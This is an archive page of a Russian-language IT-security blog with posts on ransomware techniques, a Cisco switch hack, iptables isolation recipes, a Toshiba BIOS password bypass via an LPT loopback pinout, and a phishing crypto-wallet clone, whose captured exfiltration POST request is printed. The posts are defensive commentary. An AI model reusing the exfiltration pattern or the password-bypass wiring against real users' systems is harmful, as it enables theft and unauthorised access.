Архив рубрики ‘Security’

Прочитал тут на секулабе окуитительную новость.

Western Digital на протяжении шести дней испытывает трудности с восстановлением услуг облачного сервиса My Cloud после кибератаки. В связи с многочисленными жалобами и эскалацией на уровне руководства, компания приняла решение разрешить локальный доступ к сетевым устройствам хранения данных.

То есть у этих жадных неадекватов, ябблом укушенных, доступ пользователей к собственным файлам на личном устройстве делался только через логин в их облачном сервисе. Соответственно, конторка WD имела возможность полного управления клиентскими устройствами хранения данных и могла в любой момент поставить пользователей своей продукции в позу человеческой многоножки.

Как закономерный и предсказуемый итог — массовый взлом, затронувший не только внутренние системы WD, но и работу огромного числа уже купленных устройств, установленных у пользователей. Возможно также (почти навернка, грехз было не воспользоваться таким доступом) похищение огромных объёмов пользовательских данных — причём объём утечки даже приблизительно оценить крайне затруднительно, ибо прошивки такие детальных логов не ведут, и никто не будет обследовать всю массу потенциально скомпрометированных устройств.

Впрочем, после невероятно вероломной амазоновской выходки с деплатформингом парлера репутация любых неподконтрольных/труднопереносимых облачных сервисов у внятных людей должна оцениваться на уровне плинтуса.

Всем привет.

Я писал ранее про вопросы изоляции приложений с помощью виртуальных машин и отдельных вайн-префиксов.

И если для банковских приложений подобный подход понятен (и то не всем, многие не готовы жертвовать толикой удобства во имя безопасности), то для игр это может показаться странным. Я же скажу, что такой подход было бы неплохо применять к существенному большинству сетевых приложений.

Например, такая древняя игрушка, как CoD MW2. Под неё есть древний эксплойт более чем пятилетней давности, который и через 5 лет активно эксплуатируется.

То есть запускаете вы игруху, подключаетесь к недостаточно доверенному или просто ранее взломанному игровому серверу, и клиент игры запускает нечто стороннее и к игре не относящееся в вашей системе. В последнем случае хакер был гуманный и ограничился лишь демонстрацией возможности. Однако никаких ограничений на тип запускаемого файла в данном случае нет.

В этом плане современные античит-системы, ставящие свои драйверы (а это исполняемый в ядре код, работающий с высшими привилегиями и слабо подконтрольный защитным решениям), которые тоже могут быть написаны весьма небрежно и содержать вагон уязвимостей. Вообще подобные решения под видом «защиты от читеров» позволяют себе недопустимо глубокое вмешательство в систему пользователя и существенно нарушают его приватность.

Так что если вы играете в какие-либо современные сетевые игры, ставящие подобную фигню — не считайте такие игровые машины доверенными, не админьте с них, и уж тем более не используйте там банк-клиенты и криптокошельки. Заведите под доверенные задачи маленький доверенный ноутбук.

Понятное дело, что исповедуемая мной политика нулевой терпимости к подобным руткитам (в приверженности к старым играм есть и свои плюсы 😀 ) не подойдёт активным геймерам, желающим попробовать каждую новинку, да ещё и в сугубо лицензионном её варианте.

киберзаражение =)

Posted: 2022-09-16 in IT, Security
Метки:,

Всем привет.

Если вам доводилось обслуживать по контракту сети каких-либо организаций, то в какой-то момент рано или поздно вы встретитесь с подобным письмом:

brute-force from your network / domain (*.*.*.*)
An attempt to brute-force account passwords over SSH/FTP by a machine in your domain or in your network has been detected. Attached are the host who attacks and time / date of activity. Please take the necessary action(s) to stop this activity immediately. If you have any questions please reply to this email.

Host of attacker: *.*.*.* => =>
Responsible email contacts: contact@isp-or-company.email
Attacked hosts in our Network: {тут будет куча IP-адресов}

(далее…)

Один из ведущих разработчиков и настоящий адепт SELinux, придумал вот такое объяснение «на пальцах» ключевых механизмов этой подсистемы: SELinuxColoringBook.pdf

С юмором, однако.

Попросили тут посмотреть ещё один древний ноут — Toshiba Satellite 4020CDT.
Первой проблемой оказался пароль BIOS на загрузку.
Для его сервисного сброса разработчики тошибы придумали «хитрый план» — при включении опрашивать LPT-порт (sic!), и если там определённым образом соединены линии — то пароль снимается.

http://www.tilman.de/sonstiges/toshiba/
http://www.laptoprepair101.com/remove-clear-toshiba-laptop-bios/

Ключевое там — соединить выводы порта LPT вот по такой схеме:

1+5+10
2+11
3+17
4+12
6+16
7+13
8+14
9+15

Что касается выводов с 18 по 25 — то тут в мануалах расхождения.
В немецком мануале пишут, что надо также соединить выводы 18 и 25, а выводы c 19 по 24 не трогать.
В английском же мануале пишут, что все выводы с 18 по 25 надо соединить между собой (18+19+20+21+22+23+24+25), но не присоединять к земле.

После чего ноут надо один раз включить с такой заглушкой — пароль будет снят, больше заглушка не понадобится.

Оказалось, что такой пароль мог появиться и сам по себе, при резком обесточивании или нештатном выключении.

Сервис тошибы такое втыкание анального плуга делал не бесплатно, как вы понимаете.
Мне же паять отдельный LPT-разъём было лениво (да и найти такую древность уже надо постараться), так что я сделал проще, применив обрезки витой пары:

Я пробовал первый вариант из немецкого мануала, и запрос пароля исчез. Хотя насколько я понимаю, второй вариант тоже рабочий. Ноут, правда, пока полностью не ожил, там ещё ряд проблем есть, но пароль он больше не спрашивает.

Разработчики ноутбука — редкостные извращуны, однако. Но такой способ хорош тем, что не требует разборки ноута.

Спонтанно пароль может появиться на вот этих моделях:
Satellite A100, A105, A130, A135, A200, A205, L35, M200, M205, P100, P105, P200, P205 и ряде других.

Метод в целом применим к целому семейству ноутов:
Portégé 200er, 300er, 400er, 600er, 700er, 3410, 3440, 3490, 7000, 7010, 7020, 7200, 7220 u.a.
Libretto 50, 70, 100, 110
Satellite 100er, 200er, 300er , 400er, 1800er, 1900er, 2000er, 2100er, 2200er, 2500er, 2600er, 2700er, 2800er, 4000er
Satellite Pro 400er, 4000er
Tecra 500er, 700er, 8000er, 9000er
T1900, T3600

Всем привет.
Сегодня поговорим про устройства физической безопасности — в частности, про контроллер охранной GSM-сигнализации Radsel CCU-422.
Если вам это интересно — под катом длинное продолжение и много картинок.
(далее…)

Мне тут сообщили, что оказывается выборы в США были очень честными, местные суды нарушений никаких не нашли, а всe, кто сомневается — протрампистские ватники реднеки и злобные попиратели светлой демократии. То, что в светоче демократии попутно зобанели Трампа во всех соцсетях, а соцсеть Parler вообще выперли с облачной платформы Amazon AWS — ну так то тревожный сигнал к импортозамещению и осознанию важности децентрализации шаловливые похождения блудливой невидимой руки свободного рынка.

А теперь к сути.
(далее…)

Буквально в начале лета я писал обзор на одну очень героическую попытку сделать секурити/пентест-дистриб из говна и гнилой соломы виндовс:
https://aminux.wordpress.com/2020/05/17/win10-ninjutsu/

Впрочем, авторы на этом не успокоились и выпустили вторую версию.

Ставится оно уже гораздо шустрее — всего полчасика на NVMe, а не два.
Однако при попытке логина в уже просетапленную систему созерцаем прекрасное:

При этом оно не забудет пообщаться с внешним миром:

На этом тестирование предлагаю и закончить.

DDoS Quad Damage

Posted: 2020-08-23 in Networks, Security
Метки:, ,

Многие, кто интересуется сетевой безопасностью, наверняка в курсе про такую штуку, как Amplified DDoS. Суть её в том, что конечными источниками флудящего траффика являются вполне легитимные сервера, сетевые протоколы которых такое позволяют.

Для осуществления Amplified DDoS должны сойтись вместе ряд требований:
— протокол без установления соединения (UDP)
— отсутствие внутрипротокольных проверок состояния (подписей, счётчиков, и т.п.)
— провайдер, позволяющий подменять Source IP в сетевых пакетах
— размер ответа, существенно превыщающий размер запроса

(далее…)

Мошенники не унимаются, и теперь вместо «нигерийских писем», где вам для получения олимпиарда денег надо «всего-лишь» оплатить мошенникам «пошлину за услуги/таможню/взятку», иногда стали приходить странные письма с угрозами примерно такого содержания:
(далее…)

Всем привет. Некоторое время назад я писал про плохие сценарии двухфакторной аутентификации, и как это можно попробовать исправить. Настало время немного покодить.
(далее…)

Тема троянов-шифровальщиков, вымогающих деньги за расшифровку пользовательских данных, никуда не делась, а лишь развивается и обрастает новыми техниками. Мои читатели наверняка помнят, что я сторонник качественных и изначально качественно настроенных систем, к которым виндовсы явно не относятся. Их крайне небезопасные дефолтные настройки, принятые как компромис совместимости ещё в конце 90-х/начале нулевых, так и продолжают оставаться источником больших проблем до сих пор, хотя часть их и была пофиксена.

Злоумышленники этим вовсю пользуются. Однако злодеи тоже весьма ленивы, и хотят максимум прибыли при минимуме затрат.
Но что делать, когда старый вредонос хоть и держит жертв крепко за яйки, но давно палится кем только можно, а новый и денег стоит, да и вообще неизвестная неведомая штука ? И кибер-негодяи наши потрясающее решение:

Sophos:: Ragnar Locker deploy VM to dodge security

Правильно, если у клиента есть комп с виндовс, и там есть антивирус, то надо втащить заражённому клиенту не просто троян, а целую виртуальную машину с трояном, внутри которой никакого антивируса не будет !

Схема атаки получается примерно такая:

RagnarLocker from-VM Attack scheme

Конечно, для такой радости нужны толстые каналы — придется совокупно скачать под 400 Мб данных — 120 Мб весит виртуалка и 280 образ системы. То есть при запуске дроппер делает такую вещь — ищет VirtualBox, если не находит — ставит его (причём очень древнюю перепакованную версию 3.x), скачивает образ протрояненной ВМ, содержащий очень урезанный Windows-XP-Micro, гостевые аддоны и собственно троян, в настройках этой ВМ подключает как доступные на запись каталоги все диски локального хоста (разделы с данными, сетевые диски, флешки). Дальше ВМ запускается в фоне без интерфейса с помощью VBoxHeadless и запущенный внутри неё троян сразу начинает шифровать всё интересное из подключенных снаружи дисков через механизм «Общих папок». Соответственно, всему ценному на таком хакнутом хосте наступает полный рубидий.

Базовая мера защиты — отключение работы под админом и работа с правами обычного пользователя — уже почти полностью исключила бы такой сценарий. Как минимум, никаких сносов точек восстановления и установки софтин, особенно древних версий. Даже локальный бэкап, но делаемый по уму отдельным юзером, и то был бы в этом случае в безопасности.

Так что следует быть крайне внимательным ко всему исполняемому, что может запуститься на машине — будь то программы, скрипты или даже внедрённый код каких-нибудь макросов, которые тоже тут недавно воскресли из небытия.

Делайте бэкапы, используйте адекватные реалиям и нормально настроенные системы.

win10.Нинцзюцу

Posted: 2020-05-17 in IT, Security
Метки:

Всем привет. Сегодня мы познакомимся с очень японским и очень боевым искусством скрытности и шпионажа, что с лунного читается как «нинцзюцу». Именно так называется достаточно необычный «типа пентестерский» дистриб, попавшийся мне на глаза на хабре.
(далее…)

… и получил поддержку нескольких ключей без траты очков ДНК !

Вирусы-шифровальщики продолжают активно развиваться.
Буквально вчера я писал о зафиксированном случае двойного проникновения криптования.

Оказалось, что там всё несколько интереснее.

Жертва, потеряв доступ к своим файлам в результате атаки вируса, начинает судорожно искать решения в интернетах, и может найти такие странные программы, которые обещают просканить зашифрованные файлы и попытаться помочь с расшифровкой или поиском решения.

Авторы таких поделий активно косят под антивирусных «экшпертофф».
На практике же в самом наилучшем случае прога просто будет симулировать работу и рекламировать контакты посредников, в худшем — закриптует ваши файлы ещё раз, возможно, необратимо их испортив.

Так что если вас накрыло вирусом-шифровальщиком, это не повод расслабляться, и всякие такие сторонние софтины если уж и запускать — то исключительно в отдельной виртуальной машине, иначе можно пострадать ещё сильнее и глубже.

О второй интересной фиче тоже сообщили завсегдатаи антивирусных форумов. Раньше было как — взаимодействие с кибервымогателем шло по схеме «всё или ничего». Либо нет ключа, и поциент сосёт йух, либо ключ есть, и он таки расшифровывает все свои файлы. То есть дифференциация была только между компами. Заразился соседний комп в локалке — отдельный ключ, отдельный выкуп. Теперь же новая супер-модная тенденция — дифференцировать ключи по типам файлов.

Попав на машину, вирус генерит в пределах оной машины (то есть на одно заражение) несколько разных ключей под разные задачи. Хотите расшифровать офисные файлы — купите один ключик, говно-базы говно-данных (файловые 1С, аццесс) — купите ещё один ключик, за фотографии — купите третий ключик. Число ключей и вариантов ограничено только фантазией злоумышленника.
По случаю годовщины ограбления крупного банка возможна скидка — каждый 4-й ключ бесплатно =]

Совокупная стоимость владения виндовс начинает расти угрожающими темпами. Не надейтесь на антивирусы, учитесь делать бэкапы.

Думаете, вирусы-шифровальщики давно ушли, оставшись в прошлом ?
А вот и нет. Они научились работать последовательно, причиняя двойной дамаг файлам, нервам, и кошельку.

Нашел пример особо эпического попадоса :

>> Зашифрованы файлы рабочего стола и расшаренной папки.
>> Названия стали типа График отпусков.xls[graff_de_malfet@protonmail.ch][
>> ].fjh.id-7ED6683D.[magicswordhero@aol.com].msh

здесь было двойное шифрование, вначале идет шифрование [graff_de_malfet@protonmail.ch][].fjh скорее всего Cryakl CS 1.8,

затем id-7ED6683D.[magicswordhero@aol.com].msh — это уже шифрование в Crysis.

судя по маркеру в зашифрованном файле 00000000020000000CFE7A410000000000000000000000002000000000000000

это действительно Crysis #Dharma

Оба криптовальщика используют стойкие реализации, так что тут либо нормальные бэкапы (а не та суррогатная муйня, когда бэкапные сервера глубоко введены в ту же уязвимую AD-инфраструктуру, что и всё остальное), либо платить два жирных выкупа негодяям и молиться, чтобы совокупная стоимость владения виндовс не выросла ещё больше в обоих случаях не кинули с ключами, что регулярно случается.

Довелось тут немного поремонтировать телефон 📱, и после сброса настроек обнаружил такое неприятное поведение — раз в примерно минуту издавался звук уведомления. При этом он не соответствовал звуку из настроек и гасился только уменьшением громкости звука типа «мультимедиа».
(далее…)

Есть в линуксе такой очень тёплый и очень ламповый файервол — iptables.
Присутствует он там уже 20 с лишним лет, и чаще всего используется либо в настройках по умолчанию, либо для классической раздачи инета через шлюзовой сервер посредством NAT/MASQUERADE. Иногда про него вспоминают, если поднятый сервис после старта оказался не доступен из инета =)

Однако есть у него и ряд совершенно чумовых возможностей. В одной заметке нереально уместить всё обилие фич и сценариев использования, появившихся за двадцатилетнюю историю, я же опишу лишь две из них.

IPSET.

Офигенная штука, когда надо работать с крупными списками адресов или список адресов должен быть использован более одного раза.
Пример — есть у нас список IP адресов (ркн, телеметрия майкрософт, копирасты, спамеры и прочие злыдни), с которыми соединяться не нужно даже случайно ни на вход, ни на выход. Список при этом может часто меняться. Размещать всю эту муру в основном конфиге файервола — сложно, неудобно и чревато поломкой сети в случае ошибки.
Что мы делаем ? Ставим пакет ipset, и пишем простейший скрипт типа такого:

#!/bin/sh

ipset -N banlist iphash
ipset -F banlist

# Spam bots
ipset -A banlist 92.127.233.224
ipset -A banlist 208.103.122.165
...
ipset -A banlist 95.101.95.129/25

А в начало конфига файервола пишем вот такое:
-A INPUT -m set --set banlist src -j DROP
-A OUTPUT -m set --set banlist dst -j DROP

Всё, любой входящий траффик с этих адресов и исходящий на них же будет дропаться с регистрацией в соответствующих счётчиках (iptables —list -vn). Важных замечаний ровно два. Первое — ипсеты использует такая лютая надстройка, как firewalld. Мне не очень нравится его развесистая лапша из таблиц, пытающаяся описать все распространённые случаи. Надо внимательно смотреть, что ипсеты правильно применились. Зато он полностью сам рулит ипсетами, правилами, последовательностью запуска и прочим. Но конфиг на выходе — в три экрана. Впрочем, ничто не мешает снести надстройку и написать свой конфиг файервола со скриптами, сетами и логгерами.
Второе — сеты должны быть созданы ДО запуска файервола. Как именно вы это сделаете — через юниты systemd, скриптами из rc.local или ещё как — не суть. Главное — конфиг с -m set сработает только тогда, когда используемый ipset будет создан (вполне может быть и пустым).

Очень полезная особенность — правка ipset-ов не рестартит файервол, не сбрасывает его счётчики, не трогает никакие другие правила, к ipset-у не относящиеся. В простых конфигах ipset может показаться лишней сущностью. Но для систем типа fail2ban или случая развесистых списков адресов для правил — вещь незаменимая.

-m owner

Ещё одна редко используемая, но тоже в ряде случаев полезная опция.
Идея в том, что ядро системы знает, какой исходящий траффик процессом какого пользователя порожден, и может на основании этого применить специфичную обработку траффика.
Вспомнил я про это, когда один из моих знакомых спросил, можно ли запустить некое виндовс-приложение в WINE так, чтобы он не могло вылезти в сеть.

В этом случае самое очевидное, и при этом весьма надёжное — отдельная виртуальная машина. Но это а) куда менее удобно б) требует ещё один инстанс ОС.
Однако есть и готовое решение, изумительно простое в своей изящности. Оно не столь надёжно, как изолированная ВМ без сетевой карты, но поставленную задачу тоже решает.
Идея в том, что iptables для исходящего траффика может различать траффик не только по пользователю, но и по его группе и даже по SELinux-контексту. Возня с отдельными пользователями под каждую софтину — неудобна и проблемна из-за прав доступа и вопросов доступа к X-серверу, SELinux сам по себе та ещё черная магия, а вот доступ на основе группы — это то, что доктор прописал.

Базовый ман для убунты на английскои тут: https://askubuntu.com/questions/249826/how-to-disable-internet-connection-for-a-single-process/393013#393013

Для редхатных чуть иначе.
Сперва создаем группу, которую будем назначать тем, кому надо ограничить сетевые аппетиты:

groupadd no-internet

Дальше делаем нашего пользователя членом этой группы:
usermod -G no-internet UserVasya
ВАЖНО !! Опция -G — заглавной буквой ! То есть мы добавляем пользователя UserVasya в группу no-internet, но ОСНОВНУЮ группу пользователя не меняем ! Если перепутать — пользователь останется с отломанным инетом.

В файлах это будет выглядеть вот так:

# cat /etc/group | grep UserVasya
UserVasya:x:1000:
no-internet:x:1011:UserVasya

# cat /etc/passwd | grep UserVasya
UserVasya:x:1000:1000:UserVasya:/home/UserVasya:/bin/bash

Тут у нас есть пользователь UserVasya c UID = 1000, его основная группа — тоже UserVasya, с GID = 1000. Но он также входит в группу no-internet c GID = 1011. Именно это членство позволит пользователю менять группу без ухищрений с судо и запросов паролей.

Теперь напишем сетевое правило для этой группы где-нибудь в начале фильтров для OUTPUT:

-A OUTPUT -m owner --gid-owner no-internet -j DROP

Тут мы говорим файерволу, что траффик, порожденный процессами c группой no-internet, надо тихо дропнуть.

А дальше мы просто воспользуемся утилитой sg (substitute group).

Примеры волшебных команд:

sg no-internet quake2
sg no-internet konsole
sg no-internet ~/.wine_radmin/radmin.sh
env WINEPREFIX=/home/user/.wine_ut2004 sg no-internet 'wine "C:\UT2004\System\UT2004.exe"'

При их выполнении приложения запустятся, но попытка зайти на игровые сервера, соединиться с серверами radmin или пропинговать что-то в запущенной таким способом консоли — завершится неудачей.

Однако это не является 100% способом !
Например, запущенный таким образом firefox группу не меняет, и остается с сетевым доступом !

Так что реально критичным сервисам — своя ВМ, со своим файерволом.

В следующий раз попрактикуемся в ч0рной магии.

Всем привет. Сегодня мы поговорим про двухфакторную аутентификацию, или если более широко — о дополнительных способах усиления / защиты аккаунта через дополнительные факторы аутентификации.
Если вам интересна эта тема, и вам таки есть что скрывать, например данные вашей банковской карточки, приглашаю вас в избу-читальню.
(далее…)

Если вам не безразличны государевы потуги в борьбе со свободой интернета, то вам будут определённо интересны и возможные побочные эффекты, на которые почему-то редко обращают внимание. Подробности под катом.

(далее…)

Всем привет. Сегодня мы поговорим о безопасности WINE и важности изоляции вайн-префиксов.
(далее…)

Заметка будет про китайское железо с бэкдорами и сетевую магию для нейтрализации подобной муйни.
(далее…)

Вечер пятницы пошел отлично. Вместо фитнеса после работы пришлось бороться с упавшей железкой.
Старая древняя циска-3750 пала жертвой неуловимых американских хакеров.

Один довольно свежий эксплоит «Бодрячок»:

https://pikabu.ru/story/uyazvimost_v_cisco_cve2018017_ili_klassicheskaya_pyatnitsa_5829430

, примерно 8 млн уязвимых девайсов и дурная мода циски на небезопасный по-умолчанию конфиг, в котором включено куча всего, плюс традиционная админская лень (сомнительный принцип «работает — не трогай») сделали своё дело.
Смотрю я в текущий конфиг — а там ни интерфейсов, ни ацл-ок, ни хрена.
загрузочный конфиг вообще порадовал:

Don’t mess with our elections…
~JHT
usafreedom_jht@tutanota.com

… и американский флаг в ASCII-графике.

На экране 200%-ое доказательство вмешательства американских спецслужб посредством эксплойта «Бодрячок». Срочно разбомбить Вашингтон. Выслать всех дипломатов. Попросить Путина больше не выбирать Трампа президентом США.

Пока я созерцал эту чудную аски-графику и со своего ноута переносил бэкап циско-конфига на tftp, в это время мне уже позвонил мой коллега, и сообщил, что ломают массово. Так что первым делом конфигурим минимальный сетевой интерфейс, пишем no vstack, и восстанавливаем конфиг из бэкапа, не забывал проверить злосчастную опцию. write memory, reload.
Чекать конфиг, обновлять фирмварь, выключать неиспользуемые технологии.

Всем хороших выходных, свежих прошивок и хороших конфигураций.

В камерах и DVR (IP-видеорегистраторы) hikvision похоже нашли новую багу. Пару лет назад я уже писал очень матерно-ругательную статью про эти железки, но сейчас проблема приобрела серьёзный размах — наблюдались массовые взломы таких систем, сброс настроек (даже при сильных паролях), DDoS-атаки с них (DNS-/NTP-усиление) и использование хакнутого оборудования для атак на другие сети / подбор паролей к сервисам (telnet, ssh, vnc, rdp — точно) и прочему непотребству.

Что интересно, бевардовские камеры и даже длинки, висевшие в тех же сетях, не постарадали, так что проблема чисто хиквижена. Всем срочно патчиться, менять пароли, по возможно выносить IP-камеры в более защищённые сегменты сети.

Если вам нужно повесить камеру на внешний адрес, то НЕ НАДО прифигачивать её сразу внешний адрес напрямую — ни в IPv4, ни в IPv6. Если есть роутер — затащите её за этот роутер и сделайте Port-forward для RTSP вида :

TCP+UDP: xy554 --> 192.168.x.y:554

Для получения видеопотока этого более чем достаточно. Если камера оказалась единственной на объекте (бывает такое) — применить IP-whitelist. Правда если этот вайтлист на камере обслуживает только веб-доступ, но не применяется для доступа по телнет/ссш (да, вам не приглючилось, телнет там живее всех живых и доступен на куче девайсов через интернеты) или иному кривому порту — то может не помочь.

Так что в случае хиквижена — именно big, именно факинг и именно фейл, и именно с секурити.

Всем привет ! Какое-то время назад я пообещал читателям, что обязательно поиграюсь с тулзой hashcat и поделюсь впечатлениями. С тех пор произошла одна очень интересная парольная утечка, показавшая, что даже очень длинные пароли могут быть не столь безопасны, как это кажется на первый взгляд. Итак, сегодня в нашей избе-читальне — утилита HashCat. Просим под кат.
(далее…)

Пользуясь любыми веб-системами, важно внимательно смотреть, КУДА вы зашли и ЧТО вы туда вводите.
Обычно мошенники создают фишинговые сайты для веб-морд всяких банков, с целью получить реквизиты банковских карт и пароли от банк-клиентов. Однако веб-морды есть не только у классического онлайн-банкинга, но и у криптовалютных кошельков. Криптовалюта — очень вкусная цель для злоумышленников, ведь в этом случае нет вообще никаких возможностей что-то себе вернуть при её утрате.

Например, есть такая криптовалюта, как эфириум. У эфириума очень тяжелый блокчейн, и полновесную ноду держать геморно. Поэтому существуют легковесные кошельки, которые не хранят весь блокчейн, а хрянят только кючи и заголовки необходимых блоков. Некоторые из них могут быть сделаны в виде веб-сайта.

Пример такого ресурса (нормального и валидного): https://www.myetherwallet.com/
На оригинальном сайте есть HTTPS c валидным сертификатом для компании MYETHERWALLET LLC и Extended Validation, адрес написан без ошибок, при создании нового кошелька нельзя создать кошелек с паролем меньше 9 символов, при развертывании напрямую из приватного ключа или из мнемонической фразы корректность данных проверяется локально с помощью джава-скрипта в браузере, без отправки каких-либо данных куда-либо. Кнопка Unlock становится доступной, только если данные введены полностью корректно.

Но если поискать фразу «myetherwallet» в яндексе с помощью браузера без баннерорезки, то сверху можно увидеть рекламу, ведущую на мошеннический сайт:
mwyetheerwalleet[.]com

У него нет HTTPS, адрес написан с ошибками (но малозаметными), пароли принимает любые, кнопка разбокировки становится доступной, если ввести любую строку. При нажатии кнопки Unlock данный фальшивый веб-кошелёк отправляет парольную фразу/приватный ключ на сервер 91.200.14.190 с помощью POST-запроса.
POST http:// mwyetheerwalleet .com/php/config.php
-----------------------------111222333
Content-Disposition: form-data; name="fselector1_send_ether_tokens"; filename=""
Content-Type: application/octet-stream

 

-----------------------------111222333
Content-Disposition: form-data; name="password"

 

-----------------------------111222333
Content-Disposition: form-data; name="textarea1_send_ether_tokens"

hui vam w anus a ne parolnaya fraza ot kefira
-----------------------------111222333
Content-Disposition: form-data; name="unlock2_send_ether_tokens"

 

-----------------------------111222333--

Оригинальный сайт никуда ваши ключи не отправляет, обрабатывая чувствительную инфу локально. Визуально же сайты ничем не отличаются.

Именно поэтому лучше использовать локально установленный платёжный софт, а если уж используете веб-системы (неважно, будет это криптовалютный кошелек или классический веб-банкинг) — то надо крайне внимательно проверять, что вы зашли именно куда хотели, а не к каким-то прохиндеям. Ну и нажать кнопочку «пожаловаться на мошенничество» благоразумным гражданам тоже не должно быть затруднительно.